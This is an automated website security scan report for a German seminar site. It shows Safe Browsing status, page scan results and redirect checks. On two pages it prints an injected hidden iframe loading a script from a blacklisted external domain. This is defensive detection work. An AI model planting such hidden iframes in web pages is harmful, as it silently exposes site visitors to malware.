Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=win-win-seminare.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://win-win-seminare.com/ | 200 OK Content-Length: 5374 Content-Type: text/html | malicious |
Page code contains blacklisted domain: tradeinvgroup.com ...[4154 bytes skipped]... "-2" FACE="Arial" COLOR="#FFFFFF"><SCRIPT LANGUAGE=JavaScript><!-- Begin var m = "Letztes Update am " + document.lastModified; var p = m.length-8; document.writeln("<center>"); document.write(m.substring(p, 0)); document.writeln("</center>"); // End --></SCRIPT></FONT></P></CENTER> </BODY> <div style="visibility:hidden"><iframe src="http://tradeinvgroup.com/htdocs/tde.php" width=10 height=10></iframe></div> </html> Malicious iFrame found. The same iFrame was found in 78 websites. size: 10x10 src: http://tradeinvgroup.com/htdocs/tde.php This URL is marked by Google as suspicious <iframe src="http://tradeinvgroup.com/htdocs/tde.php" width=10 height=10> | ||
http://win-win-seminare.com/book_powerbuecher_training.htm | 200 OK Content-Length: 7056 Content-Type: text/html | clean |
http://win-win-seminare.com/index.htm | 200 OK Content-Length: 5374 Content-Type: text/html | malicious |
Page code contains blacklisted domain: tradeinvgroup.com ...[4154 bytes skipped]... "-2" FACE="Arial" COLOR="#FFFFFF"><SCRIPT LANGUAGE=JavaScript><!-- Begin var m = "Letztes Update am " + document.lastModified; var p = m.length-8; document.writeln("<center>"); document.write(m.substring(p, 0)); document.writeln("</center>"); // End --></SCRIPT></FONT></P></CENTER> </BODY> <div style="visibility:hidden"><iframe src="http://tradeinvgroup.com/htdocs/tde.php" width=10 height=10></iframe></div> </html> Malicious iFrame found. The same iFrame was found in 78 websites. size: 10x10 src: http://tradeinvgroup.com/htdocs/tde.php This URL is marked by Google as suspicious <iframe src="http://tradeinvgroup.com/htdocs/tde.php" width=10 height=10> | ||
http://win-win-seminare.com/angebot.htm | 200 OK Content-Length: 16173 Content-Type: text/html | clean |
http://win-win-seminare.com/methode.htm | 200 OK Content-Length: 9481 Content-Type: text/html | clean |
http://win-win-seminare.com/mo.htm | 200 OK Content-Length: 8983 Content-Type: text/html | clean |
http://win-win-seminare.com/test404page.js | 404 Not Found Content-Length: 966 Content-Type: text/html | clean |
http://win-win-seminare.com/welcome.htm | 200 OK Content-Length: 9556 Content-Type: text/html | clean |
http://win-win-seminare.com/impressum.htm | 200 OK Content-Length: 8537 Content-Type: text/html | clean |
http://win-win-seminare.com/delphinstrategie.htm | 200 OK Content-Length: 21711 Content-Type: text/html | clean |
http://win-win-seminare.com/ailto:wroehl@bluewin.ch | 404 Not Found Content-Length: 966 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: win-win-seminare.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 Jan 2015 13:51:28 GMT
Accept-Ranges: bytes
ETag: "395152-14fe-4f0e1dd8a9f80"
Server: Apache/2
Content-Length: 5374
Content-Type: text/html
Last-Modified: Sun, 26 Jan 2014 16:13:02 GMT
...5374 bytes of data.
GET / HTTP/1.1
Host: win-win-seminare.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 Jan 2015 13:51:28 GMT
Accept-Ranges: bytes
ETag: "395152-14fe-4f0e1dd8a9f80"
Server: Apache/2
Content-Length: 5374
Content-Type: text/html
Last-Modified: Sun, 26 Jan 2014 16:13:02 GMT
...5374 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: win-win-seminare.com
Referer: http://www.google.com/search?q=win-win-seminare.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: win-win-seminare.com
Referer: http://www.google.com/search?q=win-win-seminare.com
Result:
The result is similar to the first query. There are no suspicious redirects found.